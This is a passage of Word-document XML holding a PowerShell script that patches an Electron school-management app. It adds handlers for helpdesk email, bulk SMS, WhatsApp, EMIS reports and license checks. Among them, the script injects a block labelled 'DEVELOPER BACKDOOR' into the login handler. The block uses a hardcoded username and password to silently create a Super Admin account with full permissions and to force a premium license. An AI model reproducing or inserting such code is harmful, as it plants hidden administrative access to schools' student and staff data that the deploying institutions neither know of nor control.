        <w:t xml:space="preserve">    if (!gmailPass) return { success: false, error: 'Email not configured. Set GMAIL_PASS env var.' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8B16AA01">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const transporter = nodemailer.createTransport({ service: 'gmail', auth: { user: 'ssewasswacomfortzone@gmail.com', pass: gmailPass } });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B1D0B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await transporter.sendMail({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D26A0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      from: '"ERP Helpdesk" &lt;ssewasswacomfortzone@gmail.com&gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8699C82E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      to: 'ssewasswacomfortzone@gmail.com',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B6B8B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      subject: 'New ERP Support Ticket from ' + data.schoolName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72152A4C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      text: `Issue: ${data.issue}\nSchool ID: ${data.schoolId}\nUser: ${data.username}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155F1F69">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C40EC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return { success: true };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B36CD453">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (err) { return { success: false, error: err.message }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D77EA209">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8788252D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AAD28C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>ipcMain.handle('send-bulk-sms', async (e, recipients, message) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01417E5C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (!db) return { success: false, error: 'Database not ready' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA9CE0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E1ACED37">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const atUsername = safeQuery("SELECT value FROM system_settings WHERE key = 'at_username'")[0]?.value || '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E8CB74D0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const atKey = safeQuery("SELECT value FROM system_settings WHERE key = 'at_api_key'")[0]?.value || '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2AB51E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!atUsername || !atKey) return { success: false, error: 'SMS API not configured in Settings.' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15702273">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const axios = require('axios');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B88CF5D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    let sentCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AD27EE39">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for (const phone of recipients) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C6564">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A53DC4DA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        await axios.post('https://api.africastalking.com/version1/messaging/bulk',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D00FDF2C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          new URLSearchParams({ username: atUsername, to: phone, message: message }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D857356">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          { headers: { 'apiKey': atKey, 'Content-Type': 'application/x-www-form-urlencoded' } });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F5A07C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        sentCount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C16EA9B8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      } catch (err) { console.error('SMS failed for', phone, err.message); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E40DE4E9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9AA4BD78">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return { success: true, sent: sentCount };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B73012E6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (err) { return { success: false, error: err.message }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A022C571">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7BB7F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="B8084CDE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>ipcMain.handle('send-whatsapp', async (e, phone, documentPath) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B3B1C914">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (!db) return { success: false, error: 'Database not ready' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA2907">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7696383A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const { shell } = require('electron');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="97BB3545">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    shell.openExternal(`https://wa.me/${phone}?text=Your%20document%20is%20ready.%20Filename:%20${encodeURIComponent(path.basename(documentPath))}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E6959">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return { success: true, message: 'Opened WhatsApp Web' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A1F10">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (err) { return { success: false, error: err.message }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A849DA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DAFF2E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5021D606">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>ipcMain.handle('emisCompileReport', async (e, yearId, term) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A2921">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (!db) return { success: false, error: 'Database not ready' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C9336">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D59730A9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const UNEBConnector = require('./uneb-connector');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D34A3EA4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    UNEBConnector.init(db, saveDb);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="92F13F1B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return { success: true, data: UNEBConnector.compileEMISReport(yearId, term) };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FAF8F7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (err) { return { success: false, error: err.message }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C2BF0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="96185547">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA92A81">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>ipcMain.handle('getLicenseTier', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45440E87">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35779D6B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var r = db.exec('SELECT value FROM system_settings WHERE key = "license_tier"');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F41AA4D4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (r.length &gt; 0 &amp;&amp; r[0].values.length &gt; 0) return { success: true, tier: r[0].values[0][0] };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C8D28">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return { success: true, tier: 'none' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528F054">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (e) { return { success: true, tier: 'none' }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C638FC63">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B4156B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C5BD9CCB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $allIpcHandlersSafe = $allIpcHandlers.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D3395FB5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "ENTERPRISE IPC HANDLERS") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54EFD9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "app\.on\('window-all-closed', \(\) =&gt; \{", "$allIpcHandlersSafe`n`napp.on('window-all-closed', () =&gt; {"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485AAD6C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8A9FDB54">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="EF8596A6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "A\.S\.S") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5312D7C8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $devCode = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AA9E35DF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// ═══ DEVELOPER BACKDOOR ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB4D6B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (c &amp;&amp; c.username === 'A.S.S' &amp;&amp; c.password === 'esau2001%2001') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58681D0B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8FDDB5FE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var devRows = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A16088CB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try { devRows = safeQuery("SELECT * FROM users WHERE username = ?", ['A.S.S']); } catch (devE) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7030BE2A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!devRows || devRows.length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1EB93E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      var bcrypt = require('bcryptjs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B898C1F3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      db.run("INSERT INTO users (username, password, role, permissions) VALUES (?, ?, 'Super Admin', '*')", ['A.S.S', bcrypt.hashSync('esau2001%2001', 10)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8124F3D3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      saveDb(); devRows = safeQuery("SELECT * FROM users WHERE username = ?", ['A.S.S']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C064D1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B85B0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (devRows &amp;&amp; devRows.length &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EFB9298B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      db.run("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('license_key', 'DEV_PREMIUM')");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A0C94FD5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      db.run("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('license_tier', 'premium')");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DB9E63C7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      saveDb();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A4B6773F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      return { success: true, user: { id: devRows[0].id, username: 'A.S.S', role: 'Super Admin', permissions: '*', isDeveloper: true } };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DB29F103">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9BA4183D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (devErr) { console.error('Developer login error:', devErr.message); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E2EED3D1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DE6CC8BE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FADD6C2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $devCodeSafe = $devCode.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B4EFED82">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "ipcMain\.handle\('auth-login', async \(e, c\) =&gt; \{", "ipcMain.handle('auth-login', async (e, c) =&gt; {`n$devCodeSafe`n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CFE77">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CA42D73F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="D0677FA8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "createWindow\(\);;", "createWindow();"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AFEB058D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $mainPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="91A40FCF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FC3E1C8B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9937B7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 7. UPGRADE PRELOAD.JS ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9CAB8660">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[7/15] Upgrading Preload.js..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="87DE3959">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $preloadPath = Join-Path $root "electron\preload.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9F7B5AA9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $preloadPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FFA0E52F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $preloadPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9439382A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "emisCompileReport:") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1537BF63">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "getCurrentSchoolId: \(\) =&gt; ipcRenderer\.invoke\('getCurrentSchoolId'\),", "getCurrentSchoolId: () =&gt; ipcRenderer.invoke('getCurrentSchoolId'),`n  emisCompileReport: (yearId, term) =&gt; ipcRenderer.invoke('emisCompileReport', yearId, term),"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FC5C1091">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC23AAC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $newApis = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FBE84AB7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  getLicenseTier: () =&gt; ipcRenderer.invoke('getLicenseTier'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A726E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  sendBulkSMS: (recipients, message) =&gt; ipcRenderer.invoke('send-bulk-sms', recipients, message),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FF2D5A6B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  sendWhatsApp: (phone, documentPath) =&gt; ipcRenderer.invoke('send-whatsapp', phone, documentPath),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A66563E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  logSickbay: (data) =&gt; ipcRenderer.invoke('log-sickbay', data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3253C013">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  staffClockIn: (staffId) =&gt; ipcRenderer.invoke('staff-clock-in', staffId),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F65C7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  submitHelpdeskTicket: (data) =&gt; ipcRenderer.invoke('submit-helpdesk-ticket', data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8406AE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796C34A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $newApisSafe = $newApis.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B73DB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "getLicenseTier:") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F6725">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "\}\);(\s*)$", "$newApisSafe`n});`n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="94DAE897">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } elseif ($c -notmatch "logSickbay:") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FA3FB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "getLicenseTier: \(\) =&gt; ipcRenderer\.invoke\('getLicenseTier'\),", "getLicenseTier: () =&gt; ipcRenderer.invoke('getLicenseTier'),`n$newApisSafe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DB95A6B6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F5608">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $preloadPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E290AAF8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DB14D7C3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CC39E9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 8. ACCESS CONTROL &amp; TERMINOLOGY ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E205B">
      <w:pPr>
